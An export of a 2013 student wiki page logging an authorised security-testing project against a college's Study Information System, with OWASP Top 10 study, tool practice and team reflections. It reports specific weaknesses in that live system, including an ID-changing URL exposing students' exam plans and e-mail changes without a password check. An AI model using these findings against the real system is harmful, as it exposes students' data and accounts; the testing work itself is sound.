&lt;br /&gt;
===Final documentation===&lt;br /&gt;
====Analysis====&lt;br /&gt;
&lt;br /&gt;
====Solution====&lt;br /&gt;
&lt;br /&gt;
==IP Feedback==&lt;br /&gt;
===Feedback from Sten Aus===&lt;br /&gt;
I liked IP very much. It was very mindopening experience and definitely I am going to suggest this to my friends, so they can participate next time. I think that it is very good to participate in multicultural group, where all the participants are from different countries.&lt;br /&gt;
I did not like that we had to sit so much in lectures. :) And from time to time it was hard to understand the meaning of lecture, I could not link it to our project. But I think it will come to me after a few days, months or years, as a lot in this life - you don&#039;t know the purpose yet, but you will find it out in the future.&lt;br /&gt;
&lt;br /&gt;
I enjoyed food a lot, it was a good choice to take lunches and dinners from Rahva Toit. :) Also, the pricing was good.&lt;br /&gt;
&lt;br /&gt;
I enjoyed out-of-schedule activities. For example, I liked visiting TV tower and Seaplane Harbour. I have been to TV tower before, but still it was very enjoyable experience. Also, I appreciate that Sander organized pool and bowling. Despite the fact I could not participate in pool, I was in bowling &amp;quot;competition&amp;quot; and it was fun!&lt;br /&gt;
&lt;br /&gt;
===Feedback from Matis Palm===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Sandra Suviste===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Markus Rintamäki===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Tomas Lepistö===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Mika Salmela===&lt;br /&gt;
* What I did like:&lt;br /&gt;
** First of all, i would like thank you everyone!&lt;br /&gt;
** Everything was organized well. It was nice to meet new people from other countries. Also all events were excellent!&lt;br /&gt;
&lt;br /&gt;
* What I did not like:&lt;br /&gt;
** Not so much free time T.T&lt;br /&gt;
&lt;br /&gt;
===Feedback from Kęstutis Tautvydas===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Jurij Lukjančikov===&lt;/div&gt;</summary>
		<author><name>Saus</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62404</id>
		<title>Security</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62404"/>
		<updated>2013-04-05T08:27:19Z</updated>

		<summary type="html">&lt;p&gt;Saus: /* Feedback from Sten Aus */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Team page for [[Deploying IT Infrastructure Solutions]].&lt;br /&gt;
&lt;br /&gt;
==Team Members==&lt;br /&gt;
*Sten Aus, Estonian Information Technology College&lt;br /&gt;
*Matis Palm, Estonian Information Technology College&lt;br /&gt;
*Sandra Suviste, Estonian Information Technology College&lt;br /&gt;
*Markus Rintamäki, Vaasa University of Applied Sciences&lt;br /&gt;
*Tomas Lepistö, Vaasa University of Applied Sciences&lt;br /&gt;
*Mika Salmela, Vaasa University of Applied Sciences&lt;br /&gt;
*Kęstutis Tautvydas, Vilnius University of Applied Sciences&lt;br /&gt;
*Jurij Lukjančikov, Vilnius University of Applied Sciences&lt;br /&gt;
&lt;br /&gt;
==Goal==&lt;br /&gt;
*OWASP top 10&lt;br /&gt;
*HACK DVWA&lt;br /&gt;
*BackTrack, SamuraiCD (Last year experience)&lt;br /&gt;
*Scanning and testing tools  - Qualys SSL Labs&lt;br /&gt;
*Acunetix Web Vulnerability Scanner v.8&lt;br /&gt;
*SubGraph Vega&lt;br /&gt;
*BEAST attack&lt;br /&gt;
*RC4&lt;br /&gt;
&lt;br /&gt;
==Activity==&lt;br /&gt;
===Monday - 25.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Lectures&lt;br /&gt;
* Sumorobot programming&lt;br /&gt;
* Dinner @ St Patricks&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 26.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Documentation!&lt;br /&gt;
A1 Injection - &amp;lt;b&amp;gt; Sandra &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A2 Broken Authentication and Session Management (was formerly A3) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A3 Cross-Site Scripting (XSS) (was formerly A2) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A4 Insecure Direct Object References - &amp;lt;b&amp;gt; Markus &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A5 Security Misconfiguration (was formerly A6)- &amp;lt;b&amp;gt; Tomas &amp;lt;/b&amp;gt; &lt;br /&gt;
&lt;br /&gt;
A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - &amp;lt;b&amp;gt; Mika &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - &amp;lt;b&amp;gt; Matis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - &amp;lt;b&amp;gt; Jurij &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A10 Unvalidated Redirects and Forwards - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still need to get everyone a VM with DVWA running&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Copy Paste documentation tasks to Wiki :)&lt;br /&gt;
* Divide OWASP tasks&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 27.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.&lt;br /&gt;
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.&lt;br /&gt;
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.&lt;br /&gt;
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti&#039;s presentation and Wireshark.&lt;br /&gt;
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it&#039;s nothing.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Estonian members are going to study last year&#039;s report and going to make a short overview to other members about it.&lt;br /&gt;
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.&lt;br /&gt;
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher&#039;s side as well, because teachers have a little more access than students (grades, information about student etc).&lt;br /&gt;
* In demo environment we are going to test new functions (what haven&#039;t been included in main environment, yet) - as there&#039;s some new functionality.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 28.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])&lt;br /&gt;
* Discussed the schedule and to-do list for next days&lt;br /&gt;
* Discussed some potential vulnerabilities of SIS&lt;br /&gt;
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.&lt;br /&gt;
* Prepared software for testing (Backtrack, Kali)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line (&amp;quot;Start here and go this way&amp;quot;), we will just need to start and see what we will find. &lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Find attack examples for the vulnerabilities&lt;br /&gt;
* Try them out on DVWA&lt;br /&gt;
* Get familiar with Tamper Data, Kali and Backtrack&lt;br /&gt;
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS&lt;br /&gt;
* See how to get authentication info from POST and GET&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat of a day&#039;&#039;&#039;&lt;br /&gt;
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What&#039;s more -&amp;gt; developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!&lt;br /&gt;
&lt;br /&gt;
===Friday - 29.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Learned how to perform attacks. We learned different attack methods and tried them out.&lt;br /&gt;
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.&lt;br /&gt;
* Talked about last year&#039;s experience. Tried if most of the security holes are patched or not.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* We need student access to developer environment&lt;br /&gt;
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Analysis of the results needs to be done&lt;br /&gt;
* Learn a little bit more about attacks&lt;br /&gt;
* Create some attacks&lt;br /&gt;
* Start to test simpler attacks to SIS&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threats of the day:&#039;&#039;&#039;&lt;br /&gt;
* One can see other student&#039;s exam plan just by chaning student_id value in the URL (you don&#039;t need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to &amp;quot;My data&amp;quot; and just change ID from the URL again.&lt;br /&gt;
&#039;&#039;For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Saturday - 30.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Tallinn TV Tower&lt;br /&gt;
* Visitinig The Seaplane Harbour&lt;br /&gt;
&lt;br /&gt;
===Sunday - 31.03.13===&lt;br /&gt;
&#039;&#039;&#039;Free day&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Monday - 01.04.13===&lt;br /&gt;
&#039;&#039;&#039;NB! April fools&#039; day!&#039;&#039;&#039; Beware!&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* We analyzed student information fields in &amp;quot;My data&amp;quot; section&lt;br /&gt;
* We test different sections and tried to change user IDs - luckily these are safe now.&lt;br /&gt;
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.&lt;br /&gt;
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!&lt;br /&gt;
* Tried reflected XSS, most SIS areas escape &amp;quot;bad characters&amp;quot; out from input boxes.&lt;br /&gt;
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons &#039;&#039;(for example: other person taking exams claiming he/she is someone he/she is not)&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still no new declaration etc opened for us. Maybe tomorrow?&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don&#039;t have much time left.&lt;br /&gt;
* Go deeper with different attacks and methods.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat&#039;s of the day:&#039;&#039;&#039;&lt;br /&gt;
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user&#039;s cookies and then grant access to attacker.&lt;br /&gt;
* There&#039;s no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.&lt;br /&gt;
* Calendar: there&#039;s no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.&lt;br /&gt;
* There are some developer&#039;s notes left in different SIS parts (not only in developer environment).&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 02.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Skype office.&lt;br /&gt;
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.&lt;br /&gt;
* SIS is using a field called &amp;quot;security_key_sis_global&amp;quot;. This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person&#039;s name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.&lt;br /&gt;
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.&lt;br /&gt;
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.&lt;br /&gt;
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on &amp;quot;Forgot my password&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Really would have liked to have more time to test.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Prepare and rehearse the presentation&lt;br /&gt;
* Look further into the e-mail modification issue.&lt;br /&gt;
* Finalise ASVS review&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 03.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.&lt;br /&gt;
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to &amp;quot;audience&amp;quot;.&lt;br /&gt;
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We want to review and rehearse our final presentation.&lt;br /&gt;
* Update our documentation in Wiki.&lt;br /&gt;
* Upload and link presentations to persons and fill gaps in documentation.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 04.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Dress rehearsal. Updated presentation according to feedback and capabilities.&lt;br /&gt;
* Updated documentation to Wiki and uploaded missing presentations.&lt;br /&gt;
* Personal input section filling in Wiki.&lt;br /&gt;
* Went bowling. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Sometimes one minute feels like it is not a minute. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Final documentation (link to Google docs).&lt;br /&gt;
* IP feedback&lt;br /&gt;
* Summarisation&lt;br /&gt;
&lt;br /&gt;
===Friday - 05.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Discussion about today&#039;s plans.&lt;br /&gt;
* Upgraded and linked final documentation from Google Drive (aka Google Docs) (link can be found in Materials[[#Materials_.28slides_etc.29]] section and [[#Final documentation]] section).&lt;br /&gt;
* Every member wrote a feedback to Wiki page&lt;br /&gt;
* Every member wrote a feedback according to requirements of the Intensive Programme (Erasmus feedback)&lt;br /&gt;
* IP summarisation.&lt;br /&gt;
* Farewell party at St. Patrick&#039;s.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Farewell party, sleep well and start trip to home! :)&lt;br /&gt;
&lt;br /&gt;
===Saturday - 06.04.13===&lt;br /&gt;
&#039;&#039;&#039;Departure! Bye bye!&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
==Materials (slides etc)==&lt;br /&gt;
* &#039;&#039;&#039;Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother&#039;&#039;&#039;&lt;br /&gt;
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]&lt;br /&gt;
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)&lt;br /&gt;
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)&lt;br /&gt;
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)&lt;br /&gt;
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)&lt;br /&gt;
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)&lt;br /&gt;
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1&lt;br /&gt;
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)&lt;br /&gt;
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Day summarisation:&#039;&#039;&#039;&lt;br /&gt;
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]&lt;br /&gt;
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Security teamwork (whiteboard):&#039;&#039;&#039;&lt;br /&gt;
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]&lt;br /&gt;
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]&lt;br /&gt;
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]&lt;br /&gt;
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]&lt;br /&gt;
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]&lt;br /&gt;
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Virtual Machines (VM VirtualBox .ova files):&lt;br /&gt;
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Final presentation of the project to the clients (4 April 2013)&#039;&#039;&#039;&lt;br /&gt;
** [[Media:2013_security_final_presentation.pdf|Presentation slides]] &#039;&#039;(Made by whole team, structure by Sandra and Jurij)&#039;&#039;&lt;br /&gt;
** [http://echo360.e-uni.ee/ess/echo/presentation/d465007c-1582-4e58-ae0f-c7a2aa9af988 Video from echo360] &#039;&#039;(Team Security starts from 18:30)&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Final documentation&#039;&#039;&#039;&lt;br /&gt;
** Can be found in Google Drive (link will be here soon).&lt;br /&gt;
&lt;br /&gt;
==Results==&lt;br /&gt;
Summary of what we did and solution what we developed&lt;br /&gt;
&lt;br /&gt;
===Personal input===&lt;br /&gt;
====Sten Aus====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** I was selected as a group leader (project manager) on the first day (25 March). We decided also that this is a democracy not a tyranny. :)&lt;br /&gt;
** Helped others to use different kind of tools (Apache, Linux, DVWA, Wordpress etc, as I have dealt with them before (subjects in college with Margus, pre-school experience).&lt;br /&gt;
** Presentations to each other about OWASP TOP 10 ([[Media:2013_security_a7.pdf|A7 - Missing Function Level Access Control]] and [[Media:2013_security_a10.pdf|A10 - Unvalidated Redirects and Forwards]]).&lt;br /&gt;
** Demos about SIS vulnerabilities in different presentations (to group members, other participants and audience).&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** How to do documentation? I have documented my work before as well, but in such a big group as we had, it was first time experience for me.&lt;br /&gt;
** I learned how big value &amp;quot;same day feedback and summarisation&amp;quot; has.&lt;br /&gt;
** What security threats are out there and how to protect yourself (and your systems) against them. I have already taken different security measures into account in many web applications what I am using (or administering).&lt;br /&gt;
&lt;br /&gt;
====Matis Palm====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Helped teaching Apache &amp;amp; Linux &amp;amp; DVWA to other participants (due to having some experience already from before).&lt;br /&gt;
** Helping with sumorobot programming (Being from the robotics club).&lt;br /&gt;
** I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team.&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039; What I learned:&#039;&#039;&#039;&lt;br /&gt;
** Learned alot about how to use and search information for security testing (XSS, CSRF and so on).&lt;br /&gt;
** I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on).&lt;br /&gt;
&lt;br /&gt;
====Sandra Suviste====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection ([[Media:2013_security_a1.pdf|A1 - Injections]]).&lt;br /&gt;
** Practised attacks on the DVWA.&lt;br /&gt;
** Went through the OWASP ASVS document for possible shortcomings of the SIS.&lt;br /&gt;
** Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL.&lt;br /&gt;
** Documented my own and others&#039; work.&lt;br /&gt;
** Together with Jurij we were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]]). &lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** A lot about web application vulnerabilities - from my own research &amp;amp; practice and from others&#039; presentations and teachers&#039; lectures.&lt;br /&gt;
** Became more experienced in working in a multinational group with English as the working language.&lt;br /&gt;
** I learned how to document my work in order to keep track of the work of the team.&lt;br /&gt;
** I also learned what are the issues connected to the preparing of and giving a presentation with several (&amp;gt;3) presenters.&lt;br /&gt;
&lt;br /&gt;
====Markus Rintamäki====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a4.pdf|A4 - Insecure Direct Object References]]).&lt;br /&gt;
** Different attacks on SIS, changing user ids, SQL injection and XSS.&lt;br /&gt;
** Tried to upload a picture (for a lecturer) infected with malicious .php code.&lt;br /&gt;
** I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.&lt;br /&gt;
** We made the presentation structure together.&lt;br /&gt;
** Googeled a lot :)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did.&lt;br /&gt;
** Basic attack methods in DVWA: SQL injection, XSS and CSRF. &lt;br /&gt;
** What is SIS and how does it works?&lt;br /&gt;
** I also learned to program sumorobots, more about Linux and Wireshark.&lt;br /&gt;
** And also of course I learned to speak english more fluently. :)&lt;br /&gt;
&lt;br /&gt;
====Tomas Lepistö====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Tried to find out possible security holes from OIS site.&lt;br /&gt;
** Tested different attacking methods with DVWA&lt;br /&gt;
** SQL-injection tests into various places on OIS site.&lt;br /&gt;
** Tested some XSS methods&lt;br /&gt;
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a5.pdf|A5 - Misconfigured Configuration]]).&lt;br /&gt;
** Prepared our presentation with other group members&lt;br /&gt;
** Spoke in daily summary&lt;br /&gt;
** Studied a lot of information to know what is hacking about?&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What i learned:&#039;&#039;&#039;&lt;br /&gt;
** I learned how to use SQL-injection, XSS, Brute force, CSRF&lt;br /&gt;
** I learned also how to use Kali,Backtrack,Temper data, DVWA&lt;br /&gt;
** Working in international group&lt;br /&gt;
** How important documentation is&lt;br /&gt;
** Found out how important it is to make web-application secure&lt;br /&gt;
&lt;br /&gt;
====Mika Salmela====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** I studied hacking methods&lt;br /&gt;
** Tried some hacking methods with DVWA&lt;br /&gt;
** Iscanned website, try to find if there is some security risks&lt;br /&gt;
** Tried some SQL and XSS injections&lt;br /&gt;
** OWASP TOP 10 presentations to each other [[Media:2013_security_a6.pdf|(A6 - Sensitive Data Exposure]]).&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** More than basics of how to hack?&lt;br /&gt;
** The most common hacking methods and how to use them.&lt;br /&gt;
** How to do SQL and XSS injections&lt;br /&gt;
** Basics of hacking tools&lt;br /&gt;
** How to find security risks&lt;br /&gt;
** How to work in international team.&lt;br /&gt;
** Learned much about what these are: DVWA, OWASP and ASVS.&lt;br /&gt;
&lt;br /&gt;
====Kęstutis Tautvydas====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a2.pdf|A2 - Broken Authentication and Session Management]] and [[Media:2013_security_a3.pdf|A3 - Cross-Site Scripting (XSS)]]).&lt;br /&gt;
** Searched for security holes in OIS student information site.&lt;br /&gt;
** Used DVWA tool to test sql injections and xss scripting.&lt;br /&gt;
** Tried some sql injections and xss scripting on OIS page&lt;br /&gt;
** Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates&lt;br /&gt;
** Prepared some slides for the main presentation&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What have I learned:&#039;&#039;&#039;&lt;br /&gt;
** Theory about OWASP TOP 10 threats&lt;br /&gt;
** How to do sql injections&lt;br /&gt;
** How to use Firefox tamperdata tool&lt;br /&gt;
** How to do cross-site scripting&lt;br /&gt;
** Completely understood what is use case and how to draw them&lt;br /&gt;
** How to monitor activities with Wireshark&lt;br /&gt;
** How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8&lt;br /&gt;
&lt;br /&gt;
====Jurij Lukjančikov====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a9.pdf|A9 - Using Known Vulnerable Components]])&lt;br /&gt;
**  I and Sandra were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]])&lt;br /&gt;
** XSS and injection attacks to SIS&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What have I learned:&#039;&#039;&#039;&lt;br /&gt;
** I have learned about security breaches on the web.&lt;br /&gt;
** I have tried different parts of web for vulnerabilities and injection.&lt;br /&gt;
** Together with team learned how to make injection and XSS attacks using Linux (Linux was unfamiliar for me before that).&lt;br /&gt;
&lt;br /&gt;
===Final documentation===&lt;br /&gt;
====Analysis====&lt;br /&gt;
&lt;br /&gt;
====Solution====&lt;br /&gt;
&lt;br /&gt;
==IP Feedback==&lt;br /&gt;
===Feedback from Sten Aus===&lt;br /&gt;
I liked IP very much. It was very mindopening experience and definitely I am going to suggest this to my friends, so they can participate next time. I think that it is very good to participate in multicultural group, where all the participants are from different countries.&lt;br /&gt;
